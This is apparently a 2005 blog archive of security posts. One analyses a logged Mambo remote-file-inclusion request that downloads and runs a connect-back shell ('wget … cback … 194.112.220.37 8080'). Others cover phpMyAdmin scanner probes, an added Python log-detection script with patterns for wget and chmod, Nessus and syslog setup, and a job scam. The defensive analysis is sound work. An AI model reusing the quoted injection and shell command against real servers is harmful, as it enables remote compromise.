Security: November 2005 Archives

I am seeing attacks on popular open-source software that runs on Linux, e.g.

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"


(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4, tracks here: optikom2.inw.tu-graz.ac.at, the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl, someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37, www.lbsschrems.at, WVNET Information und Kommunikation GmbH, someone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here: http://148.81.141.12/cmd.gif, is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->

At least our script writer left us his email address. He just wrote the code, of course; he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): WordPress, phpGroupWare, Drupal and AWStats. What weakness do these applications have in common? XML-RPC on PHP.

It looks like Apache needs a tool similar to Windows/IIS's URLScan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there are no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.

Weak web applications may mean your firewall is really just a router for port 80 traffic.

A New Attack


Just when I was running out of memory to run my new photo gallery (Gallery 2), I checked my log files to see what was causing some issues for me. It turns out that Gallery2 and SELinux do not get along so well, but if you edit your policy files, it can be made to work.

The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"

Apparently, there's a new tool out called "pmafind" looking for phpMyAdmin installs. I hadn't seen this one before. I guess enough people have phpMyAdmin installed in some unprotected directory to make this worthwhile.
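To show how entries like the Mambo request and the pmafind probes above could be picked out of a log automatically, here is an added example (not code from the original post): a small Python parser for Apache's combined log format that flags the remote-include, _REQUEST/GLOBALS override and shell-command indicators seen in the Mambo request, and marks hosts that use the "pmafind" user-agent or rack up many 404s guessing paths. The sample lines are constructed from the entries quoted above plus one benign request; the pattern names and the 404 threshold are my own choices.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# Indicators taken from the Mambo request quoted above: a remote URL pushed into a config
# path variable, register_globals-style _REQUEST/GLOBALS overrides, shell commands in the query.
RFI_PATTERNS = [
    ("remote-include", re.compile(r'=https?://', re.I)),
    ("globals-override", re.compile(r'(_REQUEST|GLOBALS)\[', re.I)),
    ("shell-command", re.compile(r'\b(cd|wget|curl|chmod)\b\s')),
]
SCANNER_AGENTS = {"pmafind"}  # user-agent strings of known probing tools

# Constructed sample lines, modelled on the entries quoted in the post, plus one benign request.
SAMPLE_LOG = [
    '129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content'
    '&GLOBALS=&mosConfig_absolute_path=http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20131.155.98.128/cback'
    ' HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"',
    '195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"',
    '10.0.0.5 - - [28/Nov/2005:21:00:00 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None  # None for lines that are not in combined format

def rfi_indicators(url):
    decoded = unquote(url)  # check the %-decoded form, i.e. what PHP actually sees
    return [name for name, p in RFI_PATTERNS if p.search(decoded)]

def analyze(lines, probe_threshold=5):
    """Return (rfi_hits, scanners): requests carrying injection indicators, and suspect hosts."""
    rfi_hits, scanners, not_found = [], {}, defaultdict(int)
    for rec in filter(None, map(parse_line, lines)):
        if hits := rfi_indicators(rec["url"]):
            rfi_hits.append((rec["host"], rec["url"], hits))
        if rec["agent"].lower() in SCANNER_AGENTS:
            scanners[rec["host"]] = "scanner user-agent " + rec["agent"]
        if rec["status"] == "404":
            not_found[rec["host"]] += 1
    for host, n in not_found.items():
        if n >= probe_threshold:  # many 404s from one host means path guessing, as with pmafind
            scanners.setdefault(host, f"{n} 404s (path probing)")
    return rfi_hits, scanners
```

Run analyze() over the lines of access_log to get the flagged requests and hosts; a real deployment would also want the scanner check keyed on time windows rather than a flat 404 count.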



More attacks to come...

There are some great tools available for Linux. Unfortunately, a lot of people don't use them for a variety of reasons. They don't understand Linux, and there's no standard interface on Linux, except for the über-powerful command line. (I'm still annoyed that most distributions set the default boot to the GUI.)


Nessus is one of those tools. It installs easily from the command line and it has a friendly setup script. Once you complete it, you can start the Nessus server on your Linux box. Someone has even written a friendly Windows client for Nessus, so you can control your scans from Windows.


What's the point? Nessus is a powerful security scanner/vulnerability finder that probably matches most of what's on the market. It stores results to a database (or databases), has a diff feature so you can easily track changes over time, and has a great number of options. It has nearly 10,000 plugins to run platform-specific attacks, and it does a good job of OS fingerprinting.


So I continue experimenting with Nessus, of course, on my own systems. I can have a Nessus scan against my firewall open in one window and I can watch my firewall logs in another. (Remote syslog is cool. Who knew that even cheap routers can log to syslog?)


Competing products have sexier interfaces and reports, but they cost a lot more.

I have put my Linux box to good use, installing MRTG and monitoring the bandwidth usage of my router. It turned out to be a little less simple than I thought, and I also bricked my old Linksys router. The Linksys BEFVP41 v.1 had SNMP and access log sending. Its first replacement, the BEFVP41 v.2 has access log sending but no SNMP. Thus I'm up to a Netopia R9100 that was lying around, which has SNMP, but remote syslog for router activity only.


I also bought a nice new Linksys WRT54GS v.3, which I have modded with a couple of different custom firmware developments. So far, the DD-WRT has some stability issues, so I'm still trying to choose.


What I really want is a complete access log that I can check for patterns. I want to be able to see all the traffic hitting my external interface. Do I really have to buy something like a Watchguard X5 to do this?

I also figured out how to do remote syslog after some vexation. There are actually two syslog configuration files, one in /etc and the other in /etc/sysconfig. (The man pages fail to mention the difference...) With the localx config in /etc and the -r option in /etc/sysconfig, my router (Netopia R9100) now logs all firewall violations to /var/log/router.log. Sweet. Now I just need something to parse it, although it's interesting to just keep a tail -f open.

Job Fraud


With so many people using the Internet to look for new and better jobs, a new Internet scam has begun. I keep getting emails like this:


Your resume came to us through one of our partners and we would like to set an appointment to meet with you. Albert & Alexander Associates helps direct senior executives and managers to the best jobs in the Washington DC area. We steward our clients' careers, maximizing their earning potential and job satisfaction.
If you are interested in learning more, please visit (link)
and complete our assessment. Someone will contact you shortly if we feel we can be of assistance.
Best Regards,
Albert & Alexander Associates

This is different from other, legitimate job emails from companies and recruiters I would love to work with. These guys are like Bernard Haldane, who have been caught ripping job seekers off with the promise of uncovering the "secret job market." The saddest parts are the misspellings in the subject line: "We recieved your resume" and how the return address ( washingtoncareers@gmail.com ) doesn't work. So Monster-résumé-posters beware, there is a new way for scam artists to find you. What makes this suspicious?



  • There's no specific job listed.

  • No pre-screen questions: US citizen, clearance, how much $ you want.

  • The "assessment" requires your salary from every job on your résumé.

  • Lack of specifics.

  • Lack of contactability of recruiters. The real recruiters I've spoken with are efficient, polite, and quick to respond.

  • Return email is a gmail address, even though this outfit has its own domain.
